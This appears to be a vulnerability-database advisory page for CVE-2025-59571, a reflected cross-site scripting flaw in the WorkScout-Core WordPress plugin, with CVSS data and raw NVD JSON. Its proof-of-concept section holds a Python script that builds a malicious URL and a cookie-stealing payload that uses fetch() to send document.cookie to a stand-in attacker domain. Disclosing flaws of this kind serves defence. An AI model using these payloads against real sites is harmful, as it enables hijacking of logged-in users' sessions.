Security Vulnerability Report
中文
CVE-2025-59571 CVSS 7.1 HIGH

CVE-2025-59571

Published: 2025-10-22 15:15:56
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout-Core workscout-core allows Reflected XSS.This issue affects WorkScout-Core: from n/a through < 1.7.06.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WorkScout-Core < 1.7.06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import urllib.parse # CVE-2025-59571 PoC - WorkScout-Core Reflected XSS # Target: WordPress site with WorkScout-Core plugin < 1.7.06 def generate_xss_payload(): """Generate malicious XSS payload""" # Basic XSS payload to steal cookies payload = '<script>alert(document.cookie)</script>' return payload def generate_poc_url(target_url, param_name='s'): """ Generate PoC URL for CVE-2025-59571 Args: target_url: Target WordPress site URL param_name: Parameter name vulnerable to XSS (default: 's' for search) Returns: Malicious URL with XSS payload """ payload = generate_xss_payload() encoded_payload = urllib.parse.quote(payload) # Construct malicious URL poc_url = f"{target_url}/?{param_name}={encoded_payload}" return poc_url def generate_stealer_payload(): """ Generate cookie stealer payload for more sophisticated attack This payload sends victim's cookies to attacker's controlled server """ attacker_domain = "attacker-controlled-site.com" stealer_script = f'''<script> fetch('https://{attacker_domain}/log?cookie=' + document.cookie) .then(response => response.text()) .then(data => console.log('Cookies sent')) .catch(error => console.error('Error:', error)); </script>''' return stealer_script # Example usage if __name__ == "__main__": target = "https://example-wordpress-site.com" poc_url = generate_poc_url(target) print(f"Target: {target}") print(f"PoC URL: {poc_url}") print("\nTo test:") print("1. Open the PoC URL in a browser where you're logged into the WordPress site") print("2. Observe the JavaScript alert executing document.cookie") print("3. In real attack, cookies would be sent to attacker's server")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59571", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:55.690", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout-Core workscout-core allows Reflected XSS.This issue affects WorkScout-Core: from n/a through < 1.7.06."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/workscout-core/vulnerability/wordpress-workscout-core-plugin-1-7-06-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.